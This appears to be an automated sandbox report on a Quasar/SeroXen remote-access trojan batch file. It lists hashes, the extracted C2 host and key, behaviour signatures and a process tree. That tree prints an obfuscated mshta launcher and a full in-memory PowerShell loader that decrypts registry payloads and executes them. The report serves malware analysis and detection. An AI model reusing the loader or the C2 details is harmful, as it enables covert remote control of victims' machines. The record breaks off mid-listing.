Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:40

General

  • Target

    darkmoon v2/lib/AyBYMBjlvU.bat

  • Size

    12.6MB

  • MD5

    8e3d8ed6db7cb979d5d56c8b847cc965

  • SHA1

    5d1ad752a988ce13da601448cdca5584610cffee

  • SHA256

    9d0b440b61b239bc3406d67bf7ae8baf1ceef65923e8558ce3a3c1a3c4a5e22a

  • SHA512

    d7a96420b1e61c4bc7db6c533704771e329239629201dbf34ac8a95a931da92c6e1d7ddb694a491656246b0eb491e96d194b7abccf54ef757c1aea92a9b96a0e

  • SSDEEP

    49152:Hq8mcjsXbvlusR48pNIN/I/EiFTPbYWLP17DFNkKuri3NSbkpXYyr7arOR150kFB:o

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | SeroXen

C2

seroooooxeen.chickenkiller.com:5059

Mutex

f953c0af-702a-46b5-ad07-d900b11c5cd9

Attributes
  • encryption_key

    458790DC6E62EEB3043B4566BF95CDAF711F1EC0

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 54 IoCs
  • Modifies registry class 41 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{a26461a5-892a-42e5-b77a-3e4ddb12f5c0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4364
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d01d9d77-bd1d-4074-8b1e-5e1e19532f21}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4876
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{774be542-ee5d-4963-a74a-1742a09a1223}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:220
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{32aae49c-f7f7-413e-8cc5-5c30f993071b}
          2⤵
            PID:6000
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{cfa244d3-18fe-49a9-b044-85a461f71f93}
            2⤵
              PID:5992
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{16e6edf0-0d07-4816-9ea5-b89012e3c755}
              2⤵
                PID:6100
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{d76f287a-da7e-42fe-bb39-8b72397f3f3d}
                2⤵
                  PID:1952
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1952 -s 284
                    3⤵
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    PID:5956
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{2aa18dc9-c3d8-4b82-9c78-34ed265251d6}
                  2⤵
                    PID:5788
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 5788 -s 308
                      3⤵
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      PID:4588
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{cfdef895-d064-423c-a51d-f13a9e24ab3d}
                    2⤵
                      PID:5824
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:676
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:956
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        1⤵
                          PID:724
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:1032
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1144
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1156
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                1⤵
                                • Drops file in System32 directory
                                PID:1172
                                • C:\Windows\system32\taskhostw.exe
                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                  2⤵
                                    PID:2744
                                  • C:\Windows\$sxr-mshta.exe
                                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                    2⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious use of WriteProcessMemory
                                    PID:3312
                                    • C:\Windows\$sxr-cmd.exe
                                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:4168
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:5052
                                        • C:\Windows\$sxr-powershell.exe
                                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                          4⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          • Suspicious use of WriteProcessMemory
                                          PID:2320
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{b03426dc-4124-4e80-be74-c1372aa6661b}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3728
                                          • C:\Windows\$sxr-powershell.exe
                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2320).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3912
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{6f3633da-68aa-4e77-9ef1-94386117d046}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1636
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{dc716504-febd-489c-b4a6-94421e88b40e}
                                            5⤵
                                              PID:5232
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{aa900e9d-1835-4296-81ff-1e9a8b4eb720}
                                              5⤵
                                                PID:5344
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{ad966778-7eaa-43aa-a734-488cc0b90820}
                                                5⤵
                                                  PID:5464
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 460
                                                    6⤵
                                                    • Drops file in Windows directory
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:5540
                                                • C:\Windows\SysWOW64\dllhost.exe
